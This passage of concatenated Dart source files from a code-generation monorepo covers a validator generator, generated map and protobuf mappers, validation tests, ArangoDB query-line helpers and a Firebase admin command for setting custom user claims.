return generateValidator(element, createBaseClass);
} catch (ex, stack) {
print('*** Exception: $ex with stack: $stack');
rethrow;
}
}
static String generateValidator(Element element, bool createBaseClass) {
var classElement = element.asClassElement();
if (classElement.kind == ElementKind.ENUM) return '';
var superTypeElement = classElement.supertype!.element;
var annotation = TypeChecker.fromRuntime(Validatable)
.firstAnnotationOf(superTypeElement);
var superClassIsValidatable = annotation != null;
var className = classElement.name;
var fieldDescriptors = _getFieldDescriptors(classElement);
var errorCallBuffer = StringBuffer();
var validationMethodBuffer = StringBuffer();
final nullValidationMethodBuffer = StringBuffer();
for (var fieldDescriptor in fieldDescriptors) {
var errorLine = '''
if ((error = validate${fieldDescriptor.pascalName}(entity.${fieldDescriptor.displayName}, entity: entity)) != null) {
errors.add(error!);
}
''';
errorCallBuffer.writeln(errorLine);
var validationMethodCode =
_createValidationMethod(fieldDescriptor, className);
validationMethodBuffer.writeln(validationMethodCode);
final nullValidationMethodCode =
_createNullValidationMethod(fieldDescriptor, className);
if (nullValidationMethodCode.isNotEmpty) {
nullValidationMethodBuffer.writeln(nullValidationMethodCode);
}
}
var validatorClassName = createBaseClass
? '\$${className}ValidatorBase'
: '\$${className}Validator';
var construction =
'''const \$${className}Validator${createBaseClass ? 'Base' : ''}();''';
var extendsClause = !superClassIsValidatable
? ''
: 'extends \$${superTypeElement.name}Validator';
var returnStatement = !superClassIsValidatable
? 'return ErrorList(errors);'
: 'return ErrorList.merge(super.validate(entity), errors);';
var ret = '''
class $validatorClassName $extendsClause implements Validator {
$construction
$validationMethodBuffer
$nullValidationMethodBuffer
@override
ErrorList validate(covariant $className entity) {
var errors = <ValidationError>[];
${errorCallBuffer.isNotEmpty ? 'ValidationError? error;' : ''}
$errorCallBuffer
$returnStatement
}
@override
void validateThrowing(covariant $className entity) {
var errors = validate(entity);
if (errors.validationErrors.isNotEmpty) throw errors;
}
}
''';
return ret;
}
static String _createNullValidationMethod(
FieldDescriptor fieldDescriptor, String className) {
if (fieldDescriptor.isNullable) {
return '';
}
final nullValidationMethodCode = '''
ValidationError? \$validate${fieldDescriptor.pascalName}(${fieldDescriptor.fieldElementTypeName}? value, {$className? entity})
{
if (value == null) {
return RequiredValidationError('${fieldDescriptor.displayName}');
}
return validate${fieldDescriptor.pascalName}(value, entity: entity);
}
''';
return nullValidationMethodCode;
}
static String _createValidationMethod(
FieldDescriptor fieldDescriptor,
String className,
) {
final validators = <PropertyValidator>[
RequiredValidator(),
StringLengthValidator(),
RegularExpressionValidator(),
RangeValidator(),
EmailAddressValidator(),
];
var propValidation = StringBuffer();
var previousNullCheck = false;
for (var validator in validators) {
final result =
validator.createValidatorCode(fieldDescriptor, previousNullCheck);
if (result.item2) {
previousNullCheck = true;
}
propValidation.writeln(result.item1);
}
var entityCode = _createEntityCode(fieldDescriptor);
var listCode = _createListCode(fieldDescriptor);
var ret = '''
ValidationError? validate${fieldDescriptor.pascalName}(${fieldDescriptor.fieldElementType.getDisplayString(withNullability: true)} value, {$className? entity})
{
$propValidation
$entityCode
$listCode
return null;
}
''';
return ret;
}
static String _createListCode(FieldDescriptor fieldDescriptor) {
if ((!fieldDescriptor.fieldElementType.isDartCoreIterable &&
!fieldDescriptor.fieldElementType.isDartCoreList &&
!fieldDescriptor.fieldElementType.isDartCoreSet) ||
!fieldDescriptor.parameterTypeIsValidatable ||
fieldDescriptor.parameterTypeIsEnum) return '';
final nullEscape =
fieldDescriptor.isNullable ? 'if (value == null) return null;' : '';
final asList = fieldDescriptor.fieldElementType.isDartCoreList
? ''
: 'final asList = value.toList();';
final parmType = fieldDescriptor.iterableParameterType ??
fieldDescriptor.listParameterType ??
fieldDescriptor.setParameterType;
final code = '''
$nullEscape
$asList
var errorLists = value.map((entity) {
var errors = \$${parmType!.getDisplayString(withNullability: false)}Validator().validate(entity);
var itemErrors = ListItemErrorList(${asList.isEmpty ? 'value' : 'asList'}, entity, errors);
return itemErrors;
}).where((p) => p.errorList.validationErrors.isNotEmpty).toList();
if (errorLists.isNotEmpty) {
return ListPropertyValidation('${fieldDescriptor.displayName}', errorLists);
}
''';
return code;
}
static String _createEntityCode(FieldDescriptor fieldDescriptor) {
if (!fieldDescriptor.typeIsValidatable || fieldDescriptor.typeIsEnum) {
return '';
}
var nullEscape = fieldDescriptor.isNullable
? 'if (value == null) { return null; } '
: '';
var code = '''
$nullEscape
var errors =
\$${fieldDescriptor.fieldElementType.getDisplayString(withNullability: false)}Validator().validate(value);
var errorListValidation = PropertyValidation('${fieldDescriptor.displayName}', errors);
if (errorListValidation.errorList.validationErrors.isNotEmpty) {
return errorListValidation;
}
''';
return code;
}
}
Iterable<FieldDescriptor> _getFieldDescriptors(ClassElement classElement) {
final fieldSet = classElement.getSortedFieldSet(includeInherited: false);
final fieldDescriptors =
fieldSet.map((fieldElement) => FieldDescriptor.fromFieldElement(
classElement,
fieldElement,
));
return fieldDescriptors;
}
Validatable _hydrateAnnotation(ConstantReader reader) {
var validatable = Validatable(
createValidatableBaseClass:
reader.read('createValidatableBaseClass').literalValue as bool? ??
false,
);
return validatable;
}
<|start_filename|>entity/entity_generator/lib/src/builder_generator/field_code_generators/entity_field_code_generator.dart<|end_filename|>
import 'package:squarealfa_entity_annotations/squarealfa_entity_annotations.dart';
import '../field_code_generator.dart';
import '../field_descriptor.dart';
class EntityFieldCodeGenerator extends FieldCodeGenerator {
EntityFieldCodeGenerator(
FieldDescriptor fieldDescriptor,
BuildBuilder buildBuilder,
) : super(fieldDescriptor, buildBuilder);
@override
String get fieldType => '\$${fieldDescriptor.fieldElementTypeName}Builder';
@override
String get fieldDeclaration =>
' $fieldType${fieldDescriptor.nullSuffix} ${fieldDescriptor.displayName};';
@override
String get toBuilderExpression => fieldDescriptor.isNullable
? '''entity.${fieldDescriptor.displayName} == null ? null : \$${fieldDescriptor.fieldElementTypeName}Builder.from${fieldDescriptor.fieldElementTypeName}(entity.${fieldDescriptor.displayName}!)'''
: '''\$${fieldDescriptor.fieldElementTypeName}Builder.from${fieldDescriptor.fieldElementTypeName}(entity.${fieldDescriptor.displayName})''';
@override
String get constructorAssignment => fieldDescriptor.isNullable
? ''
: '${fieldDescriptor.displayName} = ${fieldDescriptor.displayName} ?? $fieldType()';
@override
String get constructorStatement => '';
@override
String get constructorExpression =>
'${fieldDescriptor.displayName}${fieldDescriptor.isNullable ? '?' : ''}.build()';
@override
String get defaultProvided =>
' ?? \$${fieldDescriptor.fieldElementTypeName}Builder()';
@override
bool get usesDefaultsProvided => false;
}
<|start_filename|>proto_mapper/test/lib/src/appliance_type.g.dart<|end_filename|>
// GENERATED CODE - DO NOT MODIFY BY HAND
part of 'appliance_type.dart';
// **************************************************************************
// ProtoMapperGenerator
// **************************************************************************
class $ApplianceTypeProtoMapper
implements ProtoMapper<ApplianceType, GApplianceType> {
const $ApplianceTypeProtoMapper();
@override
ApplianceType fromProto(GApplianceType proto) =>
ApplianceType.values[proto.value];
@override
GApplianceType toProto(ApplianceType entity) =>
GApplianceType.valueOf(entity.index)!;
}
extension $GApplianceTypeProtoExtension on GApplianceType {
ApplianceType toApplianceType() =>
const $ApplianceTypeProtoMapper().fromProto(this);
}
<|start_filename|>firebase-auth-admin/bin/common_options.dart<|end_filename|>
class CommonOptions {
final String privateKey;
CommonOptions({
required this.privateKey,
});
}
<|start_filename|>example_model/lib/src/recipe.g.dart<|end_filename|>
// GENERATED CODE - DO NOT MODIFY BY HAND
part of 'recipe.dart';
// **************************************************************************
// MapMapGenerator
// **************************************************************************
class $RecipeMapMapper extends MapMapper<Recipe> {
const $RecipeMapMapper();
@override
Recipe fromMap(Map<String, dynamic> map) {
final $kh = const DefaultKeyHandler();
return Recipe(
key: $kh.keyFromMap(map, 'key'),
title: map['title'] as String,
ingredients: List<Ingredient>.unmodifiable(map['ingredients']
.map((e) => const $IngredientMapMapper().fromMap(e))),
runtimeTag: map['runtimeTag'] as String?,
);
}
@override
Map<String, dynamic> toMap(Recipe instance) {
final $kh = const DefaultKeyHandler();
final map = <String, dynamic>{};
$kh.keyToMap(map, instance.key, 'key');
map['title'] = instance.title;
map['ingredients'] = instance.ingredients
.map((e) => const $IngredientMapMapper().toMap(e))
.toList();
map['runtimeTag'] = instance.runtimeTag;
return map;
}
}
extension $RecipeMapExtension on Recipe {
Map<String, dynamic> toMap() => const $RecipeMapMapper().toMap(this);
static Recipe fromMap(Map<String, dynamic> map) =>
const $RecipeMapMapper().fromMap(map);
}
extension $MapRecipeExtension on Map<String, dynamic> {
Recipe toRecipe() => const $RecipeMapMapper().fromMap(this);
}
class $RecipeFieldNames {
final $kh = const DefaultKeyHandler();
final String fieldName;
final String prefix;
$RecipeFieldNames.sub(this.fieldName) : prefix = fieldName + '.';
const $RecipeFieldNames()
: fieldName = '',
prefix = '';
static const _key = 'key';
String get key => prefix + $kh.fieldNameToMapKey(_key);
static const _title = 'title';
String get title => prefix + _title;
static const _ingredients = 'ingredients';
$IngredientFieldNames get ingredients =>
$IngredientFieldNames.sub(prefix + _ingredients);
static const _runtimeTag = 'runtimeTag';
String get runtimeTag => prefix + _runtimeTag;
@override
String toString() => fieldName;
}
// **************************************************************************
// ProtoMapperGenerator
// **************************************************************************
class $RecipeProtoMapper implements ProtoMapper<Recipe, GRecipe> {
const $RecipeProtoMapper();
@override
Recipe fromProto(GRecipe proto) => _$RecipeFromProto(proto);
@override
GRecipe toProto(Recipe entity) => _$RecipeToProto(entity);
Recipe fromJson(String json) => _$RecipeFromProto(GRecipe.fromJson(json));
String toJson(Recipe entity) => _$RecipeToProto(entity).writeToJson();
String toBase64Proto(Recipe entity) =>
base64Encode(utf8.encode(entity.toProto().writeToJson()));
Recipe fromBase64Proto(String base64Proto) =>
GRecipe.fromJson(utf8.decode(base64Decode(base64Proto))).toRecipe();
}
GRecipe _$RecipeToProto(Recipe instance) {
var proto = GRecipe();
proto.key = instance.key;
proto.ptitle = instance.title;
proto.ingredients.addAll(instance.ingredients
.map((e) => const $IngredientProtoMapper().toProto(e)));
return proto;
}
Recipe _$RecipeFromProto(GRecipe instance) => Recipe(
key: instance.key,
title: instance.ptitle,
ingredients: List<Ingredient>.unmodifiable(instance.ingredients
.map((e) => const $IngredientProtoMapper().fromProto(e))),
);
extension $RecipeProtoExtension on Recipe {
GRecipe toProto() => _$RecipeToProto(this);
String toJson() => _$RecipeToProto(this).writeToJson();
static Recipe fromProto(GRecipe proto) => _$RecipeFromProto(proto);
static Recipe fromJson(String json) =>
_$RecipeFromProto(GRecipe.fromJson(json));
}
extension $GRecipeProtoExtension on GRecipe {
Recipe toRecipe() => _$RecipeFromProto(this);
}
<|start_filename|>map_mapper/test_mongo/lib/src/person.g.dart<|end_filename|>
// GENERATED CODE - DO NOT MODIFY BY HAND
part of 'person.dart';
// **************************************************************************
// MapMapGenerator
// **************************************************************************
class $PersonMapMapper extends MapMapper<Person> {
const $PersonMapMapper();
@override
Person fromMap(Map<String, dynamic> map) {
final $kh = const MongoKeyHandler();
final defaultsProvider = $PersonDefaultsProvider();
return Person(
key: getValueOrDefault($kh.fieldNameToMapKey('key'),
() => defaultsProvider.key, (mapValue) => $kh.keyFromMap(map, 'key')),
name: getValueOrDefault(map['name'], () => defaultsProvider.name,
(mapValue) => mapValue as String),
);
}
@override
Map<String, dynamic> toMap(Person instance) {
final $kh = const MongoKeyHandler();
final map = <String, dynamic>{};
$kh.keyToMap(map, instance.key, 'key');
map['name'] = instance.name;
return map;
}
}
extension $PersonMapExtension on Person {
Map<String, dynamic> toMap() => const $PersonMapMapper().toMap(this);
static Person fromMap(Map<String, dynamic> map) =>
const $PersonMapMapper().fromMap(map);
}
extension $MapPersonExtension on Map<String, dynamic> {
Person toPerson() => const $PersonMapMapper().fromMap(this);
}
class $PersonFieldNames {
final $kh = const MongoKeyHandler();
final String fieldName;
final String prefix;
$PersonFieldNames.sub(this.fieldName) : prefix = fieldName + '.';
const $PersonFieldNames()
: fieldName = '',
prefix = '';
static const _key = 'key';
String get key => prefix + $kh.fieldNameToMapKey(_key);
static const _name = 'name';
String get name => prefix + _name;
@override
String toString() => fieldName;
}
<|start_filename|>map_mapper/map_mapper_generator/lib/src/field_code_generator.dart<|end_filename|>
import 'package:decimal/decimal.dart';
import 'package:map_mapper_annotations/map_mapper_annotations.dart';
import 'package:map_mapper_generator/src/field_code_generators/key_field_code_generator.dart';
import 'field_code_generators/date_time_field_code_generator.dart';
import 'field_code_generators/decimal_field_code_generator.dart';
import 'field_code_generators/duration_field_code_generator.dart';
import 'field_code_generators/entity_field_code_generator.dart';
import 'field_code_generators/enum_field_code_generator.dart';
import 'field_code_generators/generic_field_code_generator.dart';
import 'field_code_generators/list_field_code_generator.dart';
import 'field_code_generators/set_field_code_generator.dart';
import 'field_descriptor.dart';
abstract class FieldCodeGenerator {
final FieldDescriptor fieldDescriptor;
final bool hasDefaultsProvider;
MapMap get mapEntityAnnotation => fieldDescriptor.mapMapAnnotation;
String get mapName => fieldDescriptor.mapName;
FieldCodeGenerator(this.fieldDescriptor, this.hasDefaultsProvider);
bool get usesKh => false;
String get toMapMap =>
'''map['$mapName'] = ${fieldDescriptor.isNullable ? toNullableMapExpression : toMapExpression} ;''';
String get _defaultsProviderExpression {
var ret = '''getValueOrDefault(
$mapValue, () => defaultsProvider.$fieldName, (mapValue) => ${fromMapExpression('mapValue')})''';
return ret;
}
String get mapValue => 'map[\'$mapName\']';
String get constructorMap =>
'''$fieldName: ${fieldDescriptor.isNullable ? fromNullableMapExpression : (hasDefaultsProvider ? _defaultsProviderExpression : fromMapExpression('map[\'$mapName\']'))},''';
String get fromMapMap =>
'''..$fieldName = ${fieldDescriptor.isNullable ? fromNullableMapExpression : fromMapExpression('map[\'$mapName\']')} ''';
String get fieldNamesClassFieldName =>
'static const _$fieldName = \'$fieldName\';';
String get fieldNamesClassGetter =>
'String get $fieldName => prefix + _$fieldName;';
String get toMapExpression => 'instance.$fieldName';
String get toNullableMapExpression => toMapExpression;
String fromMapExpression(String sourceExpression) {
return '$sourceExpression as ${fieldDescriptor.fieldElementTypeName}';
}
String get fromNullableMapExpression =>
'''map['$mapName'] == null ? null : ${fromMapExpression('map[\'$mapName\']')}''';
String get fieldName => fieldDescriptor.displayName;
factory FieldCodeGenerator.fromFieldDescriptor(
FieldDescriptor fieldDescriptor,
bool hasDefaultsProvider,
) {
if (fieldDescriptor.isKey) {
return KeyFieldCodeGenerator(fieldDescriptor, hasDefaultsProvider);
}
if (fieldDescriptor.fieldElementTypeName == (Decimal).toString()) {
return DecimalFieldCodeGenerator(fieldDescriptor, hasDefaultsProvider);
}
if (fieldDescriptor.fieldElementTypeName == (DateTime).toString()) {
return DateTimeFieldCodeGenerator(fieldDescriptor, hasDefaultsProvider);
}
if (fieldDescriptor.fieldElementTypeName == (Duration).toString()) {
return DurationFieldCodeGenerator(fieldDescriptor, hasDefaultsProvider);
}
if (fieldDescriptor.typeIsEnum) {
return EnumFieldCodeGenerator(fieldDescriptor, hasDefaultsProvider);
}
if (fieldDescriptor.typeHasMapMapAnnotation) {
return EntityFieldCodeGenerator(fieldDescriptor, hasDefaultsProvider);
}
if (fieldDescriptor.fieldElementType.isDartCoreSet) {
return SetFieldCodeGenerator(fieldDescriptor, hasDefaultsProvider);
}
if (fieldDescriptor.fieldElementType.isDartCoreList ||
fieldDescriptor.fieldElementType.isDartCoreIterable) {
return ListFieldCodeGenerator(fieldDescriptor, hasDefaultsProvider);
}
return GenericFieldCodeGenerator(fieldDescriptor, hasDefaultsProvider);
}
}
<|start_filename|>entity/test/test/squarealfa_validation_test_test.dart<|end_filename|>
import 'package:decimal/decimal.dart';
import 'package:squarealfa_validation_test/squarealfa_validation_test.dart';
import 'package:squarealfa_validation_test/src/empty.dart';
import 'package:test/test.dart';
void main() {
group('main group', () {
test('no error', () {
var recipe = Recipe(title: 'something', description: 'something');
var validator = $RecipeValidator();
var titleError = validator.validateTitle(recipe.title);
var descritionError = validator.validateDescription(recipe.description);
var recipeErrors = validator.validate(recipe);
expect(titleError, null);
expect(descritionError, null);
expect(recipeErrors.validationErrors.isEmpty, true);
expect(recipeErrors.hasErrors, false);
});
test('missing title', () {
var recipe = Recipe(title: '', description: 'something');
var validator = $RecipeValidator();
var titleError = validator.validateTitle(recipe.title);
var descritionError = validator.validateDescription(recipe.description);
var recipeErrors = validator.validate(recipe);
expect(titleError?.propertyName, 'title');
expect(descritionError, null);
expect(recipeErrors.validationErrors.first.propertyName, 'title');
expect(recipeErrors.validationErrors.length, 1);
expect(recipeErrors.hasErrors, true);
});
test('null description', () {
var recipe = Recipe(title: 'something', description: null);
var validator = $RecipeValidator();
var titleError = validator.validateTitle(recipe.title);
var descritionError = validator.validateDescription(recipe.description);
var recipeErrors = validator.validate(recipe);
expect(titleError, null);
expect(descritionError?.propertyName, 'description');
expect(recipeErrors.validationErrors.first.propertyName, 'description');
expect(recipeErrors.validationErrors.length, 1);
expect(recipeErrors.hasErrors, true);
});
test('empty description', () {
var recipe = Recipe(title: 'something', description: '');
var validator = $RecipeValidator();
var titleError = validator.validateTitle(recipe.title);
var descritionError = validator.validateDescription(recipe.description);
var recipeErrors = validator.validate(recipe);
expect(titleError, null);
expect(descritionError?.propertyName, 'description');
expect(recipeErrors.validationErrors.first.propertyName, 'description');
expect(recipeErrors.validationErrors.length, 1);
expect(recipeErrors.hasErrors, true);
});
test('missing title and description', () {
var recipe = Recipe(title: '', description: null);
var validator = $RecipeValidator();
var titleError = validator.validateTitle(recipe.title);
var descritionError = validator.validateDescription(recipe.description);
var recipeErrors = validator.validate(recipe);
expect(titleError?.propertyName, 'title');
expect(descritionError?.propertyName, 'description');
expect(recipeErrors.validationErrors.length, 2);
expect(recipeErrors.hasErrors, true);
});
test('No range error', () {
final ingredient = Ingredient(
description: 'this is big enough',
precision: Decimal.fromInt(15),
quantity: 15,
intQuantity: 15,
rInt: 15,
);
final validator = $IngredientValidator();
final errors = validator.validate(ingredient);
expect(errors.hasErrors, false);
});
test('Description too small', () {
final ingredient = Ingredient(
description: '',
precision: Decimal.fromInt(15),
quantity: 15,
intQuantity: 15,
rInt: 15,
);
final validator = $IngredientValidator();
final errors = validator.validate(ingredient);
expect(errors.validationErrors.first.propertyName, 'description');
});
test('Notes is too big', () {
final ingredient = Ingredient(
description: 'this is big enough',
notes: 'this is just too big',
precision: Decimal.fromInt(15),
quantity: 15,
intQuantity: 15,
rInt: 15,
);
final validator = $IngredientValidator();
final errors = validator.validate(ingredient);
expect(errors.validationErrors.first.propertyName, 'notes');
});
test('too small tag', () {
final ingredient = Ingredient(
description: 'this is big enough',
tag: '',
precision: Decimal.fromInt(15),
quantity: 15,
intQuantity: 15,
rInt: 15,
);
final validator = $IngredientValidator();
final errors = validator.validate(ingredient);
expect(errors.validationErrors.first.propertyName, 'tag');
});
test('too small quantity', () {
final ingredient = Ingredient(
description: 'this is big enough',
precision: Decimal.fromInt(15),
quantity: 5,
intQuantity: 15,
rInt: 15,
);
final validator = $IngredientValidator();
final errors = validator.validate(ingredient);
expect(errors.validationErrors.first.propertyName, 'quantity');
});
test('too big quantity', () {
final ingredient = Ingredient(
description: 'this is big enough',
precision: Decimal.fromInt(15),
quantity: 25,
intQuantity: 15,
rInt: 15,
);
final validator = $IngredientValidator();
final errors = validator.validate(ingredient);
expect(errors.validationErrors.first.propertyName, 'quantity');
});
test('too small precision', () {
final ingredient = Ingredient(
description: 'this is big enough',
precision: Decimal.fromInt(5),
quantity: 15,
intQuantity: 15,
rInt: 15,
);
final validator = $IngredientValidator();
final errors = validator.validate(ingredient);
expect(errors.validationErrors.first.propertyName, 'precision');
});
test('too small intQuantity', () {
final ingredient = Ingredient(
description: 'this is big enough',
precision: Decimal.fromInt(15),
quantity: 15,
intQuantity: 5,
rInt: 15,
);
final validator = $IngredientValidator();
final errors = validator.validate(ingredient);
expect(errors.validationErrors.first.propertyName, 'intQuantity');
});
test('too big intQuantity', () {
final ingredient = Ingredient(
description: 'this is big enough',
precision: Decimal.fromInt(15),
quantity: 15,
intQuantity: 25,
rInt: 15,
);
final validator = $IngredientValidator();
final errors = validator.validate(ingredient);
expect(errors.validationErrors.first.propertyName, 'intQuantity');
});
test('missing rInt', () {
final ingredient = Ingredient(
description: 'this is big enough',
precision: Decimal.fromInt(15),
quantity: 15,
intQuantity: 15,
);
final validator = $IngredientValidator();
final errors = validator.validate(ingredient);
expect(errors.validationErrors.first.propertyName, 'rInt');
});
test('too small rInt', () {
final ingredient = Ingredient(
description: 'this is big enough',
precision: Decimal.fromInt(15),
quantity: 15,
intQuantity: 15,
rInt: 5,
);
final validator = $IngredientValidator();
final errors = validator.validate(ingredient);
expect(errors.validationErrors.first.propertyName, 'rInt');
});
test('too big rInt', () {
final ingredient = Ingredient(
description: 'this is big enough',
precision: Decimal.fromInt(15),
quantity: 15,
intQuantity: 15,
rInt: 25,
);
final validator = $IngredientValidator();
final errors = validator.validate(ingredient);
expect(errors.validationErrors.first.propertyName, 'rInt');
});
test('too small nIntQuantity', () {
final ingredient = Ingredient(
description: 'this is big enough',
precision: Decimal.fromInt(15),
quantity: 15,
intQuantity: 15,
rInt: 15,
nintQuantity: 5);
final validator = $IngredientValidator();
final errors = validator.validate(ingredient);
expect(errors.validationErrors.first.propertyName, 'nintQuantity');
});
test('too big nIntQuantity', () {
final ingredient = Ingredient(
description: 'this is big enough',
precision: Decimal.fromInt(15),
quantity: 15,
intQuantity: 15,
rInt: 15,
nintQuantity: 25);
final validator = $IngredientValidator();
final errors = validator.validate(ingredient);
expect(errors.validationErrors.first.propertyName, 'nintQuantity');
});
test('too empty', () {
final empty = Empty();
final validator = $EmptyValidator();
final errors = validator.validate(empty);
expect(errors.validationErrors.isEmpty, true);
});
});
}
<|start_filename|>arango_driver/lib/src/query/line_if_then.dart<|end_filename|>
import 'query_text_fragment.dart';
/// Line of query text with condition.
/// If [bool] `cond` is true, then [String] `when_true` will pasted into query.
/// Sample:
/// ```
/// Query([
/// Line('FOR doc in documents'),
/// LineIfThen(tag != null, 'FILTER doc.tags && POSITION( doc.tags, tag )'),
/// ...
/// ])
/// ```
class LineIfThen extends QueryTextFragment {
LineIfThen(bool cond, String whenTrue) : super(cond ? whenTrue : '');
}
<|start_filename|>arango_driver/lib/src/query/line.dart<|end_filename|>
import 'query_text_fragment.dart';
/// Simple text line for injecting it into the query, constructed by [Query()].
/// Sample:
/// ```
/// Query([ Line('FOR doc in documents'), ... ])
/// ```
class Line extends QueryTextFragment {
Line(String line) : super(line);
@override
String toString() => line;
}
<|start_filename|>map_mapper/test/lib/src/category.g.dart<|end_filename|>
// GENERATED CODE - DO NOT MODIFY BY HAND
part of 'category.dart';
// **************************************************************************
// MapMapGenerator
// **************************************************************************
class $CategoryMapMapper extends MapMapper<Category> {
const $CategoryMapMapper();
@override
Category fromMap(Map<String, dynamic> map) {
final $kh = const DefaultKeyHandler();
return Category(
id: $kh.keyFromMap(map, 'id'),
title: map['title'] as String,
mainComponentId: $kh.keyFromMap(map, 'mainComponentId'),
mainComponent: const $ComponentMapMapper().fromMap(map['mainComponent']),
alternativeComponent: (map['alternativeComponent'] != null
? const $ComponentMapMapper().fromMap(map['alternativeComponent'])
: null),
otherComponents: List<Component>.unmodifiable(map['otherComponents']
.map((e) => const $ComponentMapMapper().fromMap(e))),
secondaryComponents: map['secondaryComponents'] == null
? null
: List<Component>.unmodifiable(map['secondaryComponents']
.map((e) => const $ComponentMapMapper().fromMap(e))),
);
}
@override
Map<String, dynamic> toMap(Category instance) {
final $kh = const DefaultKeyHandler();
final map = <String, dynamic>{};
$kh.keyToMap(map, instance.id, 'id');
map['title'] = instance.title;
$kh.keyToMap(map, instance.mainComponentId, 'mainComponentId');
map['mainComponent'] =
const $ComponentMapMapper().toMap(instance.mainComponent);
map['alternativeComponent'] = (instance.alternativeComponent == null
? null
: const $ComponentMapMapper().toMap(instance.alternativeComponent!));
map['otherComponents'] = instance.otherComponents
.map((e) => const $ComponentMapMapper().toMap(e))
.toList();
map['secondaryComponents'] = instance.secondaryComponents == null
? null
: instance.secondaryComponents!
.map((e) => const $ComponentMapMapper().toMap(e))
.toList();
return map;
}
}
extension $CategoryMapExtension on Category {
Map<String, dynamic> toMap() => const $CategoryMapMapper().toMap(this);
static Category fromMap(Map<String, dynamic> map) =>
const $CategoryMapMapper().fromMap(map);
}
extension $MapCategoryExtension on Map<String, dynamic> {
Category toCategory() => const $CategoryMapMapper().fromMap(this);
}
class $CategoryFieldNames {
final $kh = const DefaultKeyHandler();
final String fieldName;
final String prefix;
$CategoryFieldNames.sub(this.fieldName) : prefix = fieldName + '.';
const $CategoryFieldNames()
: fieldName = '',
prefix = '';
static const _id = 'id';
String get id => prefix + $kh.fieldNameToMapKey(_id);
static const _title = 'title';
String get title => prefix + _title;
static const _mainComponentId = 'mainComponentId';
String get mainComponentId =>
prefix + $kh.fieldNameToMapKey(_mainComponentId);
static const _mainComponent = 'mainComponent';
$ComponentFieldNames get mainComponent =>
$ComponentFieldNames.sub(prefix + _mainComponent);
static const _alternativeComponent = 'alternativeComponent';
$ComponentFieldNames get alternativeComponent =>
$ComponentFieldNames.sub(prefix + _alternativeComponent);
static const _otherComponents = 'otherComponents';
$ComponentFieldNames get otherComponents =>
$ComponentFieldNames.sub(prefix + _otherComponents);
static const _secondaryComponents = 'secondaryComponents';
$ComponentFieldNames get secondaryComponents =>
$ComponentFieldNames.sub(prefix + _secondaryComponents);
@override
String toString() => fieldName;
}
<|start_filename|>firebase-auth-admin/bin/set_custom_claims_command.dart<|end_filename|>
import 'dart:convert';
import 'package:args/args.dart';
import 'command.dart';
import 'common_options.dart';
class SetCustomClaimsCommand extends Command {
final String uid;
final bool clear;
final List<String> add;
final List<String> remove;
final Map<String, dynamic>? jsonMap;
SetCustomClaimsCommand(
CommonOptions commonOptions,
this.uid, {
required this.clear,
required this.add,
required this.remove,
this.jsonMap,
}) : super(commonOptions);
factory SetCustomClaimsCommand.fromResults(
CommonOptions commonOptions,
ArgResults results,
) {
final uid = results['uid'];
final clear = results['clear'] ?? false;
final add = results['add'] as List<String>;
final remove = results['remove'] as List<String>;
final jsonText = results['json'] as String? ?? '';
final Map<String, dynamic>? jsonMap =
jsonText.isEmpty ? null : jsonDecode(jsonText);
return SetCustomClaimsCommand(
commonOptions,
uid,
clear: clear,
add: add,
remove: remove,
jsonMap: jsonMap,
);
}
static void addCommand(ArgParser parser) {
var cc = parser.addCommand('setCustomClaims');
cc.addOption(
'uid',
abbr: 'u',
help: 'UID of the user',
mandatory: true,
);
cc.addOption(
'json',
abbr: 'j',
help: 'Parse the base claims from the given JSON structure.',
);
cc.addFlag(
'clear',
abbr: 'c',
help: 'Remove all previously existing claims',
defaultsTo: false,
);
cc.addMultiOption(
'add',
abbr: 'a',
help:
'''Add claim with its name and value separated by a colon (ex: adm:true).''',
);
cc.addMultiOption(
'remove',
abbr: 'r',
help: '''Remove the claim with the name.''',
);
}
}
<|start_filename|>proto_mapper/test/lib/grpc/key.pb.dart<|end_filename|>
///
// Generated code. Do not modify.
// source: key.proto
//
// @dart = 2.12
// ignore_for_file: annotate_overrides,camel_case_types,unnecessary_const,non_constant_identifier_names,library_prefixes,unused_import,unused_shown_name,return_of_invalid_type,unnecessary_this,prefer_final_fields
import 'dart:core' as $core;
import 'package:protobuf/protobuf.dart' as $pb;
class GKey extends $pb.GeneratedMessage {
static final $pb.BuilderInfo _i = $pb.BuilderInfo(
const $core.bool.fromEnvironment('protobuf.omit_message_names')
? ''
: 'GKey',
createEmptyInstance: create)
..aOS(
1,
const $core.bool.fromEnvironment('protobuf.omit_field_names')
? ''
: 'key')
..hasRequiredFields = false;
GKey._() : super();
factory GKey({
$core.String? key,
}) {
final _result = create();
if (key != null) {
_result.key = key;
}
return _result;
}
factory GKey.fromBuffer($core.List<$core.int> i,
[$pb.ExtensionRegistry r = $pb.ExtensionRegistry.EMPTY]) =>
create()..mergeFromBuffer(i, r);
factory GKey.fromJson($core.String i,
[$pb.ExtensionRegistry r = $pb.ExtensionRegistry.EMPTY]) =>
create()..mergeFromJson(i, r);
@$core.Deprecated('Using this can add significant overhead to your binary. '
'Use [GeneratedMessageGenericExtensions.deepCopy] instead. '
'Will be removed in next major version')
GKey clone() => GKey()..mergeFromMessage(this);
@$core.Deprecated('Using this can add significant overhead to your binary. '
'Use [GeneratedMessageGenericExtensions.rebuild] instead. '
'Will be removed in next major version')
GKey copyWith(void Function(GKey) updates) =>
super.copyWith((message) => updates(message as GKey))
as GKey; // ignore: deprecated_member_use
$pb.BuilderInfo get info_ => _i;
@$core.pragma('dart2js:noInline')
static GKey create() => GKey._();
GKey createEmptyInstance() => create();
static $pb.PbList<GKey> createRepeated() => $pb.PbList<GKey>();
@$core.pragma('dart2js:noInline')
static GKey getDefault() =>
_defaultInstance ??= $pb.GeneratedMessage.$_defaultFor<GKey>(create);
static GKey? _defaultInstance;
@$pb.TagNumber(1)
$core.String get key => $_getSZ(0);
@$pb.TagNumber(1)
set key($core.String v) {
$_setString(0, v);
}
@$pb.TagNumber(1)
$core.bool hasKey() => $_has(0);
@$pb.TagNumber(1)
void clearKey() => clearField(1);
}
class GListOfKey extends $pb.GeneratedMessage {
static final $pb.BuilderInfo _i = $pb.BuilderInfo(
const $core.bool.fromEnvironment('protobuf.omit_message_names')
? ''
: 'GListOfKey',
createEmptyInstance: create)
..pc<GKey>(
1,
const $core.bool.fromEnvironment('protobuf.omit_field_names')
? ''
: 'items',
$pb.PbFieldType.PM,
subBuilder: GKey.create)
..hasRequiredFields = false;
GListOfKey._() : super();
factory GListOfKey({
$core.Iterable<GKey>? items,
}) {
final _result = create();
if (items != null) {
_result.items.addAll(items);
}
return _result;
}
factory GListOfKey.fromBuffer($core.List<$core.int> i,
